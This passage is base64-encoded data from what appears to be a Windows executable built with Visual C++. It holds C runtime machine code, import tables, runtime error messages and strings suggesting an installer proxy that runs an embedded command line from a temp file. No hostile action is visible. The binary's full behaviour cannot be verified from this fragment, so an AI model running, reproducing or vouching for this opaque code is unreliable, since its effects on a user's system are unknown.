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AFWdAhqCuiajf//Weio4f//hcB0CGoW6Krh//9Z9gXQHkEAAg+EygAAAImF4P3//4mN3P3//4mV2P3//4md1P3//4m10P3//4m9zP3//2aMlfj9//9mjI3s/f//ZoydyP3//2aMhcT9//9mjKXA/f//ZoytvP3//5yPhfD9//+LdQSNRQSJhfT9///HhTD9//8BAAEAibXo/f//i0D8alCJheT9//+Nhdj8//9qAFDoTHv//42F2Pz//4PEDImFKP3//42FMP3//2oAx4XY/P//FQAAQIm15Pz//4mFLP3///8VTOBAAI2FKP3//1D/FUjgQABqA+gojP//zGoQaDj+QADolGr//zPAi10IM/873w+VwDvHdR3oYF7//8cAFgAAAFdXV1dX6Ohd//+DxBSDyP/rU4M9hCtBAAN1OGoE6Dq+//9ZiX38U+jG0///WYlF4DvHdAuLc/yD7gmJdeTrA4t15MdF/P7////oJQAAADl94HUQU1f/NaQoQQD/FTDgQACL8IvG6FRq///DM/+LXQiLdeRqBOgIvf//WcOL/1WL7IPsDKEEEEEAM8WJRfxqBo1F9FBoBBAAAP91CMZF+gD/FTDhQACFwHUFg8j/6wqNRfRQ6PEBAABZi038M83o2k7//8nDi/9Vi+yD7DShBBBBADPFiUX8i0UQi00YiUXYi0UUU4lF0IsAVolF3ItFCFcz/4lNzIl94Il91DtFDA+EXwEAAIs15OBAAI1N6FFQ/9aLHWTgQACFwHReg33oAXVYjUXoUP91DP/WhcB0S4N96AF1RYt13MdF1AEAAACD/v91DP912OgBqv//i/BZRjv3fluB/vD//393U41ENgg9AAQAAHcv6BEBAACLxDvHdDjHAMzMAADrLVdX/3Xc/3XYagH/dQj/04vwO/d1wzPA6dEAAABQ6Mbx//9ZO8d0CccA3d0AAIPACIlF5OsDiX3kOX3kdNiNBDZQV/915OgZef//g8QMVv915P913P912GoB/3UI/9OFwHR/i13MO990HVdX/3UcU1b/deRX/3UM/xVw4EAAhcB0YIld4Otbix1w4EAAOX3UdRRXV1dXVv915Ff/dQz/04vwO/d0PFZqAehrqP//WVmJReA7x3QrV1dWUFb/deRX/3UM/9M7x3UO/3Xg6IiE//9ZiX3g6wuDfdz/dAWLTdCJAf915OgT5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3VnaCBzcGFjZSBmb3IgbG9jYWxlIGluZm9ybWF0aW9uDQoAAAAAAABSNjAzMQ0KLSBBdHRlbXB0IHRvIGluaXRpYWxpemUgdGhlIENSVCBtb3JlIHRoYW4gb25jZS4KVGhpcyBpbmRpY2F0ZXMgYSBidWcgaW4geW91ciBhcHBsaWNhdGlvbi4NCgAAUjYwMzANCi0gQ1JUIG5vdCBpbml0aWFsaXplZA0KAABSNjAyOA0KLSB1bmFibGUgdG8gaW5pdGlhbGl6ZSBoZWFwDQoAAAAAUjYwMjcNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgbG93aW8gaW5pdGlhbGl6YXRpb24NCgAAAABSNjAyNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciBzdGRpbyBpbml0aWFsaXphdGlvbg0KAAAAAFI2MDI1DQotIHB1cmUgdmlydHVhbCBmdW5jdGlvbiBjYWxsDQoAAABSNjAyNA0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciBfb25leGl0L2F0ZXhpdCB0YWJsZQ0KAAAAAFI2MDE5DQotIHVuYWJsZSB0byBvcGVuIGNvbnNvbGUgZGV2aWNlDQoAAAAAUjYwMTgNCi0gdW5leHBlY3RlZCBoZWFwIGVycm9yDQoAAAAAUjYwMTcNCi0gdW5leHBlY3RlZCBtdWx0aXRocmVhZCBsb2NrIGVycm9yDQoAAAAAUjYwMTYNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgdGhyZWFkIGRhdGENCgANClRoaXMgYXBwbGljYXRpb24gaGFzIHJlcXVlc3RlZCB0aGUgUnVudGltZSB0byB0ZXJtaW5hdGUgaXQgaW4gYW4gdW51c3VhbCB3YXkuClBsZWFzZSBjb250YWN0IHRoZSBhcHBsaWNhdGlvbidzIHN1cHBvcnQgdGVhbSBmb3IgbW9yZSBpbmZvcm1hdGlvbi4NCgAAAFI2MDA5DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIGVudmlyb25tZW50DQoAUjYwMDgNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgYXJndW1lbnRzDQoAAABSNjAwMg0KLSBmbG9hdGluZyBwb2ludCBzdXBwb3J0IG5vdCBsb2FkZWQNCgAAAABNaWNyb3NvZnQgVmlzdWFsIEMrKyBSdW50aW1lIExpYnJhcnkAAAAACgoAAC4uLgA8cHJvZ3JhbSBuYW1lIHVua25vd24+AABSdW50aW1lIEVycm9yIQoKUHJvZ3JhbTogAAAAAAAAAAUAAMALAAAAAAAAAB0AAMAEAAAAAAAAAJYAAMAEAAAAAAAAAI0AAMAIAAAAAAAAAI4AAMAIAAAAAAAAAI8AAMAIAAAAAAAAAJAAAMAIAAAAAAAAAJEAAMAIAAAAAAAAAJIAAMAIAAAAAAAAAJMAAMAIAAAAAAAAAEVuY29kZVBvaW50ZXIAAABLAEUAUgBOAEUATAAzADIALgBEAEwATAAAAAAARGVjb2RlUG9pbnRlcgAAAEZsc0ZyZWUARmxzU2V0VmFsdWUARmxzR2V0VmFsdWUARmxzQWxsb2MAAAAAAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+fwAoAG4AdQBsAGwAKQAAAAAAKG51bGwpAAAGAAAGAAEAABAAAwYABgIQBEVFRQUFBQUFNTAAUAAAAAAoIDhQWAcIADcwMFdQBwAAICAIAAAAAAhgaGBgYGAAAHhweHh4eAgHCAAABwAICAgAAAgACAAHCAAAAEdldFByb2Nlc3NXaW5kb3dTdGF0aW9uAEdldFVzZXJPYmplY3RJbmZvcm1hdGlvbkEAAABHZXRMYXN0QWN0aXZlUG9wdXAAAEdldEFjdGl2ZVdpbmRvdwBNZXNzYWdlQm94QQBVU0VSMzIuRExMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAIAAgACAAIAAgACAAIAAgACgAKAAoACgAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABIABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAIQAhACEAIQAhACEAIQAhACEAIQAEAAQABAAEAAQABAAEACBAIEAgQCBAIEAgQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAEAAQABAAEAAQABAAggCCAIIAggCCAIIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABAAEAAQABAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgACAAIAAgACAAIAAgACAAIABoACgAKAAoACgAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEACEAIQAhACEAIQAhACEAIQAhACEABAAEAAQABAAEAAQABAAgQGBAYEBgQGBAYEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBARAAEAAQABAAEAAQAIIBggGCAYIBggGCAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgEQABAAEAAQACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABQAFAAQABAAEAAQABAAFAAQABAAEAAQABAAEAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBEAABAQEBAQEBAQEBAQEBAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECARAAAgECAQIBAgECAQIBAgECAQEBAAAAAICBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5eltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlae3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/0hIOm1tOnNzAAAAAGRkZGQsIE1NTU0gZGQsIHl5eXkATU0vZGQveXkAAAAAUE0AAEFNAABEZWNlbWJlcgAAAABOb3ZlbWJlcgAAAABPY3RvYmVyAFNlcHRlbWJlcgAAAEF1Z3VzdAAASnVseQAAAABKdW5lAAAAAEFwcmlsAAAATWFyY2gAAABGZWJydWFyeQAAAABKYW51YXJ5AERlYwBOb3YAT2N0AFNlcABBdWcASnVsAEp1bgBNYXkAQXByAE1hcgBGZWIASmFuAFNhdHVyZGF5AAAAAEZyaWRheQAAVGh1cnNkYXkAAAAAV2VkbmVzZGF5AAAAVHVlc2RheQBNb25kYXkAAFN1bmRheQAAU2F0AEZyaQBUaHUAV2VkAFR1ZQBNb24AU3VuAAAAAAAGgICGgIGAAAAQA4aAhoKAFAUFRUVFhYWFBQAAMDCAUICIAAgAKCc4UFeAAAcANzAwUFCIAAAAICiAiICAAAAAYGhgaGhoCAgHeHBwd3BwCAgAAAgACAAHCAAAAENPTk9VVCQAU3VuTW9uVHVlV2VkVGh1RnJpU2F0AAAASmFuRmViTWFyQXByTWF5SnVuSnVsQXVnU2VwT2N0Tm92RGVjAAAAAE0AUwBJACAAUAByAG8AeAB5ACAARQByAHIAbwByAAAALAAAAFUAbgBhAGIAbABlACAAdABvACAAcABhAHIAcwBlACAAYwBvAG0AbQBhAG4AZAAgAGwAaQBuAGUAAAAAAEkAbgB2AGEAbABpAGQAIABwAGEAcgBhAG0AZQB0AGUAcgAgAGMAbwB1AG4AdAAgAFsAJQBkAF0ALgAAAE8AcgBpAGcAaQBuAGEAbAAgAGMAbwBtAG0AYQBuAGQAIABsAGkAbgBlAD0AJQBzAAAAAABNAGUAPQAlAHMAAABJAG4AdgBhAGwAaQBkACAAcABhAHIAYQBtAGUAdABlAHIAIABvAGYAZgBzAGUAdAAgAFsAJQBkAF0ALgAAAAAAVwBvAHIAawBpAG4AZwAgAEQAaQByAD0AJQBzAAAAAABTAHUAYwBjAGUAcwBzACAAQwBvAGQAZQBzAD0AJQBzAAAAAAAAAAAATQBhAHIAawBlAHIAIABuAG8AdAAgAGYAbwB1AG4AZAAgAGkAbgAgAGMAbwBtAG0AYQBuAGQAIABsAGkAbgBlAC4AAABFAG0AYgBlAGQAZABlAGQAIABjAG8AbQBtAGEAbgBkACAAbABpAG4AZQA9AFsAJQBzAF0AAAAAAFUAbgBhAGIAbABlACAAdABvACAAZwBlAHQAIAB0AGUAbQBwACAAZABpAHIALgAAAE0AUwBJAAAAVQBuAGEAYgBsAGUAIAB0AG8AIABnAGUAdAAgAHQAZQBtAHAAIABmAGkAbABlACAAbgBhAG0AZQAuAAAAcgBiAAAAAABFAHIAcgBvAHIAIABvAHAAZQBuAGkAbgBnACAAaQBuAHAAdQB0ACAAZgBpAGwAZQAuACAARQByAHIAbwByAC